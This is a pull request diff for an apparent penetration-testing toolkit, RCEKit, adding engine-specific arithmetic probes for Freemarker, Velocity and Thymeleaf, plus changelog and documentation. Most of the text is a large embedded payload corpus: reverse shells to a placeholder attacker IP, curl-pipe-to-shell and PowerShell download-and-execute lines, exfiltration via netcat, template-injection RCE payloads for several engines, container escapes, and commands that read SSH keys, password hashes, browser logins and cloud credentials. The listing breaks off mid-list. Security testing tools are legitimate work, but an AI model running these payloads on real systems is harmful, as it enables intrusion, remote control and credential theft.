### PR TITLE
feat(detection): carriers for the three engines that evaluate but do not show it

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,6 +8,48 @@ formats, or the template schema.
 
 ## [Unreleased]
 
+## [2.27.0] — 2026-08-17
+
+Engine carriers for the `eval` probe. Three template engines evaluate the
+injected expression perfectly and still made RCEKit report `negative`, because
+what came back was not the bare product the oracle searches for.
+
+### Added
+
+- **`eval_carriers` in the corpus**, and `--eval-engines auto|<names>` to select
+  them. A carrier wraps the same random-operand arithmetic in an engine-specific
+  form; it never changes the oracle, and the bare probes still run first. Each
+  entry records `notes` (why it exists) and `verified` (what it was measured
+  against). Declarative, so a new carrier is a JSON entry rather than a code
+  change.
+
+  | Engine | Bare `${a*b}` returned | Carrier | Carrier returned |
+  |---|---|---|---|
+  | Freemarker | `2,070,761,401` (locale grouping) | `${(a*b)?c}` | `2070761401` |
+  | Velocity | `${a*b}` verbatim — a *reference*, not an expression | `#set($rk=a*b)$rk` | `2070761401` |
+  | Thymeleaf | `${a*b}` verbatim — needs inlining brackets | `[[${a*b}]]` | `2070761401` |
+
+  Measured against freemarker 2.3.32, velocity-engine-core 2.3 and thymeleaf
+  3.1.2, running RCEKit's own generated probes through each engine: bare form
+  `CONFIRMS=no`, carrier `CONFIRMS=YES`, for all three.
+- **The evidence line names the carrier** — `target computed '3979016' via the
+  freemarker carrier` — so a finding says which engine quirk it worked around.
+  A bare confirmation reads exactly as before.
+
+### Notes
+
+- **Carriers are not sandbox escapes, and no sandbox-escape carrier ships.** The
+  premise that a sandboxed engine blocks the arithmetic probe did not survive
+  measurement: a member-access sandbox restricts method and field access, and
+  arithmetic needs neither. With OGNL member access denied for *everything*,
+  `40277*51413` still returned `2070761401` while `@java.lang.Math@max(1,2)` was
+  blocked; SpEL's restricted `SimpleEvaluationContext` and Jinja2's
+  `SandboxedEnvironment` behaved the same way. The bare probes already cover
+  those engines.
+- The frequently-cited OGNL escape `(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)`
+  additionally targets a field that **no longer exists in OGNL 3.3.4**, so on a
+  current engine it is a probe that can only come back negative.
+
 ## [2.26.0] — 2026-08-16
 
 The sink-shape ladder. An injected value lands in a *shape* — mid-command,
@@ -458,7 +500,8 @@ this file and have not been restated here.
 - **[2.7.0]**
 - **[2.1.0]**
 
-[Unreleased]: https://github.com/kabiri-labs/rcekit/compare/v2.26.0...HEAD
+[Unreleased]: https://github.com/kabiri-labs/rcekit/compare/v2.27.0...HEAD
+[2.27.0]: https://github.com/kabiri-labs/rcekit/compare/v2.26.0...v2.27.0
 [2.26.0]: https://github.com/kabiri-labs/rcekit/compare/v2.25.0...v2.26.0
 [2.25.0]: https://github.com/kabiri-labs/rcekit/compare/v2.24.0...v2.25.0
 [2.24.0]: https://github.com/kabiri-labs/rcekit/compare/v2.23.3...v2.24.0

--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — prove RCE, don't guess it
 
-**Version 2.26.0** · MIT · Python 3.8+ · zero third-party dependencies
+**Version 2.27.0** · MIT · Python 3.8+ · zero third-party dependencies
 
 RCEKit is an **RCE detection &amp; confirmation toolkit** for authorised penetration
 testing, red teaming, and security research. Point it at a target you are allowed

--- a/docs/reference.md
+++ b/docs/reference.md
@@ -54,6 +54,7 @@ starting point — this page is for looking things up once you know what you wan
 | `--probe-depth` | `full` (also the substitution-free and comment-terminated shapes) or `quick` | `full` |
 | `--detect-json` | Also write the run to this path as JSON: overall verdict, counts, every probe | None |
 | `--sink-shape` | Sink shapes the shell probes try: `auto`, or any of `sep`, `raw`, `chain`, `newline`, `dq`, `sq`, `subshell` | `auto` |
+| `--eval-engines` | (`eval`) Engine carriers to add to the bare expression probes: `auto`, or names from `eval_carriers` | `auto` |
 
 | `--methods` value | Confirms | Tier it can reach |
 |---|---|---|
@@ -102,6 +103,46 @@ depth and `--probe-depth` changes nothing for it.
 sweep, and it does not narrow the separator screen `--methods time` runs: both
 depths try every candidate break-out, because dropping one is not a saving in
 requests but a blind spot. Use `--separators` to narrow that deliberately.
+
+### Expression-engine carriers
+
+The `eval` method injects a product of two random operands in each common
+template syntax and confirms that the **product** comes back. Most engines need
+nothing more than that. Three do, and `--eval-engines` controls the extra probes
+for them.
+
+A carrier exists for exactly one reason: **the engine evaluates the expression
+perfectly but does not put the bare product in the response**, so the oracle
+cannot see it and a vulnerable target reads as `negative`.
+
+| Engine | Bare `${a*b}` returns | Carrier | Carrier returns |
+|---|---|---|---|
+| Freemarker | `2,070,761,401` — grouped by locale | `${(a*b)?c}` | `2070761401` |
+| Velocity | `${a*b}` verbatim — it is a *reference*, not an expression | `#set($rk=a*b)$rk` | `2070761401` |
+| Thymeleaf | `${a*b}` verbatim — needs its inlining brackets | `[[${a*b}]]` | `2070761401` |
+
+Measured against freemarker 2.3.32, velocity-engine-core 2.3 and thymeleaf
+3.1.2; each corpus entry records what it was verified against.
+
+**A sandbox is not what carriers are for.** A member-access sandbox restricts
+method and field access; arithmetic and string concatenation need neither, so
+the bare probe survives one. Measured:
+
+| Engine | Bare `a*b` | `Runtime`-class member access |
+|---|---|---|
+| OGNL, member access denied for *everything* | evaluates | blocked |
+| SpEL `SimpleEvaluationContext` (restricted) | evaluates | blocked |
+| Jinja2 `SandboxedEnvironment` | evaluates | blocked |
+| Groovy, ERB, JS `eval`, Python `eval` | evaluates | — |
+
+So the bare probes already cover the sandboxed engines, and narrowing
+`--eval-engines` saves little — there are only three carriers, and they are the
+cheap part of the run.
+
+Carriers live in `eval_carriers` in `templates/payloads.json`, so a new one is a
+JSON entry, not a code change. Each records `notes` (why it exists) and
+`verified` (what it was measured against); a carrier without measured evidence
+that the bare probe fails is a probe that can only waste a request.
 
 ### The sink-shape ladder
 

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.26.0"
+__version__ = "2.27.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -252,6 +252,9 @@ class RCEKit:
 
         self.payload_categories: Dict[str, Any] = {}
         self.detection_payloads: Dict[str, List[str]] = {}
+        # Engine-specific wrappers for the `eval` arithmetic probe, declared in
+        # the corpus so coverage can be extended without touching Python.
+        self.eval_carriers: Dict[str, Dict[str, Any]] = {}
         self._load_template_payloads()
 
         # Encoding and obfuscation techniques.
@@ -329,6 +332,7 @@ class RCEKit:
                 data = json.loads(template_file.read())
             self.payload_categories = data.get("payload_categories", {})
             self.detection_payloads = data.get("detection_payloads", {})
+            self.eval_carriers = data.get("eval_carriers", {})
         except Exception as exc:
             message = f"unable to parse {self.template_path}: {exc}"
             logger.error("%s", message)
@@ -351,6 +355,7 @@ class RCEKit:
             data = json.loads(EMBEDDED_PAYLOAD_CORPUS)
             self.payload_categories = data.get("payload_categories", {})
             self.detection_payloads = data.get("detection_payloads", {})
+            self.eval_carriers = data.get("eval_carriers", {})
         except Exception as exc:  # pragma: no cover — a build-time guarantee
             message = f"unable to parse the built-in payload corpus: {exc}"
             logger.error("%s", message)
@@ -2536,6 +2541,10 @@ class Probe:
     # cheaply before committing to an expensive measurement.
     separator: Optional[str] = None
     phase: str = "main"
+    # The engine-specific carrier this probe was wrapped in, if any. Named in
+    # the evidence so a finding says which engine's quirk it had to work around
+    # rather than leaving the tester to rediscover it.
+    carrier: Optional[str] = None
 
 
 @dataclass
@@ -2692,7 +2701,8 @@ class DetectionMethod:
             detail = "" if control_where == "response body" else f" ({control_where})"
             return Verdict("inconclusive", f"{noun} also present in the payload-free control{detail}")
         channel_note = "" if where == "response body" else f" in {where}"
-        evidence = (f"target computed {probe.expected!r}{channel_note} "
+        carrier_note = f" via the {probe.carrier} carrier" if probe.carrier else ""
+        evidence = (f"target computed {probe.expected!r}{channel_note}{carrier_note} "
                     "(random operands, absent from control)")
         if probe.forbidden and self._search_channels(probe.forbidden, channels):
             evidence += "; target also reflects the payload verbatim"
@@ -3332,8 +3342,33 @@ class EvalExpr(DetectionMethod):
         "@({expr})",         # Razor
     )
 
+    # The token a corpus carrier substitutes the arithmetic into. Deliberately
+    # not a brace placeholder: every carrier template is itself full of braces,
+    # and escaping them for str.format is a bug waiting to happen in a file
+    # contributors are meant to edit by hand.
+    CARRIER_TOKEN = "__EXPR__"
+
     def applicable(self, record: "PayloadRecord") -> bool:
         return True
+
+    def _selected_carriers(self) -> List[Tuple[str, Dict[str, Any]]]:
+        """The corpus carriers to try, honouring ``--eval-engines``.
+
+        An unknown name is not silently dropped: narrowing a run to nothing
+        because of a typo would report a clean negative from a run that tested
+        almost nothing."""
+        carriers = getattr(self.gen, "eval_carriers", None) or {}
+        wanted = self.config.get("eval_engines")
+        selected = []
+        for name, carrier in carriers.items():
+            if not isinstance(carrier, dict) or not carrier.get("template"):
+                continue
+            if wanted:
+                engines = set(carrier.get("engines") or []) | {name}
+                if not engines & set(wanted):
+                    continue
+            selected.append((name, carrier))
+        return selected
 
     def build_probes(self, record: "PayloadRecord", rng: "random.Random") -> List[Probe]:
         a = rng.randint(1000, 9999)
@@ -3341,9 +3376,23 @@ class EvalExpr(DetectionMethod):
         expr = f"{a}*{b}"
         expected = str(a * b)
         probes: List[Probe] = []
+        # Bare forms first: fewest requests, cleanest evidence line, and they
+        # already cover every engine measured to evaluate a plain expression --
+        # OGNL (even with member access denied outright), SpEL (including its
+        # restricted context), Groovy, Jinja2 (including SandboxedEnvironment),
+        # ERB, and raw eval sinks. A member-access sandbox restricts method and
+        # field access; arithmetic needs neither, so it is not what a carrier is
+        # for here.
         for form in self._FORMS:
             probes.append(Probe(payload=self._wrap_context(record, form.format(expr=expr)),
                                 expected=expected, forbidden=expr))
+        # Then the carriers, for the engines that do NOT return a bare product
+        # from a bare expression. Each is a measured false negative, not a
+        # precaution -- see the `verified` note on each corpus entry.
+        for name, carrier in self._selected_carriers():
+            body = str(carrier["template"]).replace(self.CARRIER_TOKEN, expr)
+            probes.append(Probe(payload=self._wrap_context(record, body),
+                                expected=expected, forbidden=expr, carrier=name))
         return probes
 
     def confirm(self, obs: "Observation", probe: "Probe") -> Verdict:
@@ -4117,6 +4166,14 @@ def main():
                              "send shell probes as bare commands ONLY. Narrowing alias for "
                              "--sink-shape raw; the ladder already tries the raw shape alongside "
                              "the others, so this is for cutting requests once you know the sink.")
+    parser.add_argument("--eval-engines", default=None, metavar="ENGINES",
+                        help="(--methods eval) Comma-separated engine carriers to add to the "
+                             "bare expression probes, or 'auto' (default) for all of them. "
+                             "Carriers exist only for engines that do not return a bare product "
+                             "from a bare expression — freemarker (groups digits: 2,070,761,401), "
+                             "velocity (${a*b} is a reference, not an expression) and thymeleaf "
+                             "(needs its inlining brackets). Every other engine is covered by the "
+                             "bare probes, sandboxed or not, so narrowing this saves little.")
     parser.add_argument("--sink-shape", default=None, metavar="SHAPES",
                         help="(--methods) Which sink shapes the shell probes try, comma-separated: "
                              f"auto (default, the whole ladder) or any of {', '.join(SINK_SHAPE_RUNGS)}. "
@@ -4191,6 +4248,11 @@ def main():
     except ValueError as exc:
         print(f"[!] {exc}")
         return 1
+    eval_engines_raw = from_profile(args.eval_engines, "eval_engines")
+    if isinstance(eval_engines_raw, str):
+        eval_engines_raw = None if eval_engines_raw.strip() == "auto" else [
+            part.strip() for part in eval_engines_raw.split(",") if part.strip()]
+    eval_engines = tuple(eval_engines_raw) if eval_engines_raw else None
     if needs_separator and sink_shapes is None:
         # A profile that states the sink concatenates input mid-command has
         # already ruled the raw shape out: the value is never the whole command
@@ -4432,7 +4494,7 @@ def main():
             detection_config = {"webroot": args.webroot, "web_base_url": args.web_base_url,
                                 "time_base": args.time_base, "evade": args.evade,
                                 "sink_raw": sink_raw, "separators": separators,
-                                "sink_shapes": sink_shapes,
+                                "sink_shapes": sink_shapes, "eval_engines": eval_engines,
                                 "probe_depth": args.probe_depth,
                                 "contexts_explicit": bool(selected_contexts),
                                 "oob_host": args.oob_host,
@@ -4651,621 +4713,673 @@ def main():
 # Source: templates/payloads.json — edit that file, then re-run the script.
 EMBEDDED_PAYLOAD_CORPUS = r"""
 {
-    "payload_categories": {
-        "basic_enum": {
-            "unix": [
-                "id",
-                "whoami",
-                "uname -a",
-                "pwd",
-                "ls -la",
-                "ps aux",
-                "uptime",
-                "cat /etc/os-release",
-                "env",
-                "last -n 5",
-                "lsb_release -a 2>/dev/null"
-            ],
-            "windows": [
-                "whoami",
-                "ver",
-                "dir",
-                "tasklist",
-                "ipconfig",
-                "systeminfo",
-                "wmic os get Caption,CSDVersion,OSArchitecture,Version",
-                "set",
-                "query user",
-                "whoami /groups"
-            ]
-        },
-        "file_operations": {
-            "unix": [
-                "cat /etc/passwd",
-                "cat /etc/shadow",
-                "head -n 10 /etc/passwd",
-                "tail -f /var/log/syslog",
-                "find / -name '*.conf' -type f 2>/dev/null",
-                "ls -la /root 2>/dev/null",
-                "find /home -maxdepth 2 -type f -name '.ssh' 2>/dev/null",
-                "find / -perm -4000 -type f 2>/dev/null",
-                "getfacl -R /home 2>/dev/null",
-                "tar -cf /tmp/etc_backup.tar /etc 2>/dev/null"
-            ],
-            "windows": [
-                "type C:\\Windows\\System32\\drivers\\etc\\hosts",
-                "dir C:\\Windows\\System32\\drivers\\etc",
-                "dir C:\\Users",
-                "dir C:\\\\ProgramData",
-                "type C:\\\\Windows\\\\System32\\\\config\\\\SAM 2>nul",
-                "dir %USERPROFILE%\\\\Documents",
-                "type %USERPROFILE%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data 2>nul"
-            ]
-        },
-        "network_operations": {
-            "unix": [
-                "ifconfig",
-                "netstat -tulpn",
-                "arp -a",
-                "ping -c 4 127.0.0.1",
-                "ip addr",
-                "ss -tunlp",
-                "route -n",
-                "dig +short myip.opendns.com @resolver1.opendns.com"
-            ],
-            "windows": [
-                "ipconfig /all",
-                "netstat -ano",
-                "arp -a",
-                "ping -n 4 127.0.0.1",
-                "Get-NetIPConfiguration",
-                "route print",
-                "powershell -Command \"Resolve-DnsName {attacker_domain}\"",
-                "powershell -Command \"(Invoke-WebRequest -UseBasicParsing https://ifconfig.me).Content\""
-            ]
-        },
-        "code_execution": {
-            "nodejs": {
-                "child_process_exec": [
-                    "require('child_process').exec('whoami')",
-                    "require('child_process').exec('cat /etc/passwd | nc {attacker_ip} 443')",
-                    "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"')",
-                    "require('child_process').spawnSync('whoami').stdout.toString()",
-                    "process.mainModule.require('child_process').exec('id')"
-                ],
-                "pug_ssti": [
-                    "= 7 * 7",
-                    "= require('child_process').exec('whoami')",
-                    "= global.process.mainModule.require('child_process').exec('id')"
-                ],
-                "ejs_ssti": [
-                    "<%= 7 * 7 %>",
-                    "<%= require('child_process').exec('whoami') %>",
-                    "<%- global.process.mainModule.require('child_process').exec('id') %>"
-                ],
-                "handlebars_ssti": [
-                    "{{7 * 7}}",
-                    "{{ {math} }}",
-                    "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}",
-                    "{{#with (lookup (lookup this '__proto__') 'constructor')}}{{#with (lookup this 'constructor')}}{{call this 'cat /etc/passwd'}}{{/with}}{{/with}}"
-                ],
-                "vm_eval": [
-                    "(new (require('vm').Script)(`require('child_process').exec('whoami')`)).runInThisContext()",
-                    "vm.runInNewContext(`require('child_process').exec('curl http://{attacker_domain}/x.sh | sh')`, {}, { timeout: 1000 })",
-                    "require('vm').runInNewContext(`process.mainModule.require('child_process').exec('id')`)"
-                ],
-                "deserialization": [
-                    "const serialize = require('node-serialize'); const payload = \"{\\\"rce\\\": \\\"_$$ND_FUNC$$_function(){require('child_process').exec('id');}()\\\"}\"; serialize.unserialize(payload);",
-                    "const payload = \"{\\\"rce\\\":\\\"_$$ND_FUNC$$_function(){process.mainModule.require('child_process').exec('id');}()\\\"}\"; require('node-serialize').unserialize(payload);"
-                ],
-                "expression_template": [
-                    "{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
-                    "={{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
-                    "{{ (function(){ return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}",
-                    "={{ $jmespath ? '' : (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}"
-                ]
-            },
-            "python": {
-                "os_system": [
-                    "os.system('whoami')",
-                    "os.system('cat /etc/passwd')",
-                    "os.system('bash -i >& /dev/tcp/{attacker_ip}/443 0>&1')",
-                    "__import__('os').system('id')",
-                    "os.popen('hostname').read()"
-                ],
-                "subprocess": [
-                    "subprocess.call(['whoami'], shell=True)",
-                    "subprocess.Popen('cat /etc/passwd', shell=True).communicate()",
-                    "subprocess.check_output('uname -a', shell=True)"
-                ],
-                "jinja2_ssti": [
-                    "{{7*7}}",
-                    "{{ {math} }}",
-                    "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
-                    "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
-                    "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
-                    "{{cycler.__init__.__globals__['os'].popen('whoami').read()}}",
-                    "{{''.__class__.__mro__[2].__subclasses__()[40]('/bin/sh',shell=True,stdout=-1).communicate()}}"
-                ],
-                "exec_ast": [
-                    "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef _(): pass",
-                    "@exec(\"raise Exception(open('/etc/passwd').read())\")\ndef _(): pass",
-                    "def _(a=exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")): pass",
-                    "def _(a=exec(\"raise Exception(open('/etc/passwd').read())\")): pass",
-                    "def _(a=__import__('os').system('id')): pass"
-                ]
-            },
-            "postgres": {
-                "psql_meta_command": [
-                    "SELECT 1;\n\\! id\n",
-                    "SELECT 1;\n\\! cat /etc/passwd\n",
-                    {"payload": "SELECT 1;\r\\! id\r", "notes": ["CR (\\r) separates the meta-command so a newline-based validator (e.g. pgAdmin CVE-2025-13780) does not detect the \\! line"]},
-                    {"payload": "SELECT 1;\r\\! cat /etc/passwd\r", "notes": ["CR (\\r) meta-command bypass; psql still executes \\! after splitting on CR"]},
-                    {"payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r", "expected_channel": "response", "notes": ["blind sink: confirm out-of-band or via the written marker rather than the HTTP response"]},
-                    {"payload": "SELECT 1;\r\\! curl -s {callback}\r", "notes": ["blind async sink: {callback} is filled by the chain runner with the OOB listener URL; confirmation is the received callback, not the HTTP response"]},
-                    {"payload": "SELECT 1;\r\\! python3 -c 'import urllib.request;urllib.request.urlopen(\"{callback}\")'\r", "notes": ["blind async sink, curl-free OOB callback via python3; confirmed by the received callback"]}
-                ]
-            },
-            "php": {
-                "exec_system": [
-                    "system('whoami')",
-                    "exec('whoami')",
-                    "shell_exec('whoami')",
-                    "passthru('whoami')",
-                    "eval('system(\"whoami\")')",
-                    "preg_replace('/.*/e','system(\"whoami\")','')",
-                    "$output = shell_exec('whoami'); echo $output;",
-                    "system($_GET['cmd']);",
-                    "shell_exec('curl http://{attacker_domain}/payload.sh | sh');"
-                ],
-                "eval": [
-                    "assert(\"system('whoami')\");",
-                    "@create_function(\"\", \"system('ls');\");",
-                    "eval(base64_decode('c3lzdGVtKCd3aG9hbWknKTs='));"
-                ],
-                "deserialize": [
-                    "$payload = file_get_contents('php://input'); $object = unserialize($payload);",
-                    "$obj = unserialize($_POST['payload']); var_dump($obj);"
-                ]
-            },
-            "java": {
-                "runtime_exec": [
-                    "Runtime.getRuntime().exec(\"whoami\")",
-                    "new ProcessBuilder(\"whoami\").start()",
-                    "Runtime.getRuntime().exec(\"cat /etc/passwd\")",
-                    "Process process = new ProcessBuilder().command(\"bash\",\"-c\",\"id\").start();",
-                    "Runtime.getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"});"
-                ],
-                "freemarker_ssti": [
-                    "${7*7}",
-                    "${'freemarker.template.utility.Execute'?new()('id')}",
-                    "<#assign ex = 'freemarker.template.utility.Execute'?new()>${ ex('id')}",
-                    "${'freemarker.template.utility.Execute'?new()('cat /etc/passwd')}"
-                ],
-                "velocity_ssti": [
-                    "#set($x='') $x",
-                    "#set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $d=$ex.getInputStream() $d=$chr.toChars($d.readBytes($d.available())) $out=$str.valueOf($d) $out",
-                    "#set($process=$x.class.forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')) $process"
-                ],
-                "thymeleaf_ssti": [
-                    "[[${7*7}]]",
-                    "[[${T(java.lang.Runtime).getRuntime().exec('id')}]]",
-                    "[[${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')}]]"
-                ],
-                "deserialization": [
-                    "new ObjectInputStream(new ByteArrayInputStream(payload)).readObject(); // ysoserial gadget",
-                    "new ObjectInputStream(new FileInputStream(\"payload.bin\")).readObject();"
-                ],
-                "expression": [
-                    "javax.script.ScriptEngineManager m = new javax.script.ScriptEngineManager(); m.getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('id')\");",
-                    "new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"java.lang.Runtime.getRuntime().exec('cat /etc/passwd')\");"
-                ],
-                "spel": [
-                    "T(java.lang.Runtime).getRuntime().exec(\"id\")",
-                    "new java.lang.ProcessBuilder(new String[]{\"bash\",\"-c\",\"id\"}).start()",
-                    "T(java.lang.Runtime).getRuntime().exec(new String[]{\"bash\",\"-c\",\"cat /etc/passwd\"})"
-                ],
-                "ognl": [
-                    "(#rt=@java.lang.Runtime@getRuntime()).exec(\"id\")",
-                    "%{(#rt=@java.lang.Runtime@getRuntime()).(#rt.exec(\"id\"))}",
-                    "(#cmd=\"id\").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.start())"
-                ],
-                "groovy": [
-                    "\"id\".execute()",
-                    "[\"bash\",\"-c\",\"id\"].execute()",
-                    "Runtime.getRuntime().exec(\"id\")",
-                    "this.class.classLoader.parseClass(\"Runtime.getRuntime().exec('id')\").newInstance()"
-                ]
-            },
-            "dotnet": {
-                "process_start": [
-                    "Process.Start(\"whoami.exe\")",
-                    "Process.Start(\"cmd.exe\", \"/c whoami\")",
-                    "new Process { StartInfo = new ProcessStartInfo { FileName = \"cmd.exe\", Arguments = \"/c whoami\" } }.Start()",
-                    "Process.Start(new ProcessStartInfo(\"cmd.exe\"){Arguments=\"/c whoami\",UseShellExecute=false,RedirectStandardOutput=true});",
-                    "System.Diagnostics.Process.Start(\"powershell.exe\",\"-Command \\\"Get-Process\\\"\");"
-                ],
-                "deserialize": [
-                    "new BinaryFormatter().Deserialize(new MemoryStream(payload)); // Gadget execution",
-                    "new NetDataContractSerializer().Deserialize(new MemoryStream(payload));"
-                ]
-            },
-            "ruby": {
-                "kernel_system": [
-                    "system('whoami')",
-                    "`whoami`",
-                    "Kernel.system('whoami')",
-                    "Kernel.exec('whoami')",
-                    "IO.popen('id'){|io| io.read }",
-                    "%x(id)"
-                ],
-                "erb_ssti": [
-                    "<%= 7 * 7 %>",
-                    "<%= `whoami` %>",
-                    "<%= File.open('/etc/passwd').read %>",
-                    "<%= IO.popen('id'){|io| io.read } %>"
-                ]
-            },
-            "perl": {
-                "system_backticks": [
-                    "system('whoami')",
-                    "`whoami`",
-                    "exec('whoami')",
-                    "print `id`;",
-                    "open(my $fh, '-|', 'id'); while(<$fh>){print;}"
-                ]
-            },
-            "go": {
-                "os_exec": [
-                    "exec.Command(\"whoami\").Output()",
-                    "exec.Command(\"bash\", \"-c\", \"whoami\").Output()",
-                    "exec.Command(\"cat\", \"/etc/passwd\").Output()",
-                    "cmd := exec.Command(\"sh\",\"-c\",\"id\"); out, _ := cmd.CombinedOutput(); string(out)",
-                    "exec.Command(\"powershell\",\"-Command\",\"whoami\").Output()"
-                ]
-            }
-        },
-        "download_execute": {
-            "unix": [
-                "curl http://{attacker_domain}/shell.sh | sh",
-                "wget http://{attacker_domain}/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
-                "python3 -c \"import urllib.request; exec(urllib.request.urlopen('http://{attacker_domain}/shell.py').read())\"",
-                "perl -e 'use LWP::Simple; getstore(\"http://{attacker_domain}/shell\", \"/tmp/shell\"); system(\"/tmp/shell\");'",
-                "php -r \"$c=file_get_contents('http://{attacker_domain}/payload.php'); eval($c);\""
-            ],
-            "windows": [
-                "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://{attacker_domain}/shell.ps1')\"",
-                "certutil -urlcache -f http://{attacker_domain}/shell.exe shell.exe && shell.exe",
-                "bitsadmin /transfer job /download /priority high http://{attacker_domain}/shell.exe shell.exe && shell.exe",
-                "powershell -c \"Invoke-WebRequest -Uri 'http://{attacker_domain}/shell.ps1' -OutFile $env:TEMP\\shell.ps1; . $env:TEMP\\shell.ps1\""
-            ]
-        },
-        "reverse_shells": {
-            "unix": [
-                "bash -i >& /dev/tcp/{attacker_ip}/443 0>&1",
-                "nc -e /bin/sh {attacker_ip} 443",
-                "python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"{attacker_ip}\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'",
-                "perl -e 'use Socket;$i=\"{attacker_ip}\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
-                "php -r '$sock=fsockopen(\"{attacker_ip}\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
-            ],
-            "windows": [
-                "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()\"",
-                "powershell -nop -w hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"",
-                "cmd.exe /c powershell -Command \"$sm=(New-Object Net.Sockets.TCPClient('{attacker_ip}',443)).GetStream();$sw=New-Object IO.StreamWriter($sm);$sr=New-Object IO.StreamReader($sm);while(($cmd=$sr.ReadLine()) -ne $null){$send=(iex $cmd 2>&1 | Out-String);$sw.WriteLine($send);$sw.Flush()}\""
-            ]
-        },
-        "container_escape": {
-            "docker": [
-                "cat /proc/1/environ",
-                "nsenter --target 1 --mount --uts --ipc --net --pid /bin/sh",
-                "cp /bin/sh /host/tmp/sh && chmod +s /host/tmp/sh",
-                "mount | grep overlay",
-                "docker run -v /:/host alpine chroot /host /bin/sh"
-            ],
-            "kubernetes": [
-                "kubectl get pods --namespace kube-system",
-                "kubectl run rce --image=alpine --restart=Never --command -- sh -c 'nc {attacker_ip} 443 -e /bin/sh'",
-                "kubectl exec -n kube-system kube-apiserver-0 -- cat /etc/kubernetes/admin.conf",
-                "kubectl auth can-i --list",
-                "kubectl get secrets -A"
-            ]
-        },
-        "credential_access": {
-            "unix": [
-                "grep -Ri 'password' /etc 2>/dev/null",
-                "ls -la ~/.ssh",
-                "cat ~/.ssh/id_rsa 2>/dev/null",
-                "find / -name 'id_rsa' -o -name '*.kdbx' 2>/dev/null",
-                "awk -F: '{ if ($2 != \"*\" && $2 != \"!\") print $1 }' /etc/shadow 2>/dev/null"
-            ],
-            "windows": [
-                "cmdkey /list",
-                "dir C:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials",
-                "reg query HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon",
-                "findstr /si password *.txt *.config *.ini",
-                "type %USERPROFILE%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\* 2>nul"
-            ],
-            "php": [
-                "$config = include 'config.php'; var_dump($config);",
-                "echo file_get_contents(__DIR__ . '/.env');",
-                "echo file_get_contents('/var/www/html/config/database.php');"
-            ],
-            "python": [
-                "import os; print(os.environ.get('AWS_SECRET_ACCESS_KEY'))",
-                "from pathlib import Path; print(Path.home().joinpath('.aws','credentials').read_text())",
-                "import keyring; print(keyring.get_keyring())"
-            ]
-        },
-        "privilege_escalation": {
-            "unix": [
-                "sudo -l",
-                "cat /etc/sudoers",
-                "find / -perm -4000 -type f 2>/dev/null",
-                "getcap -r / 2>/dev/null",
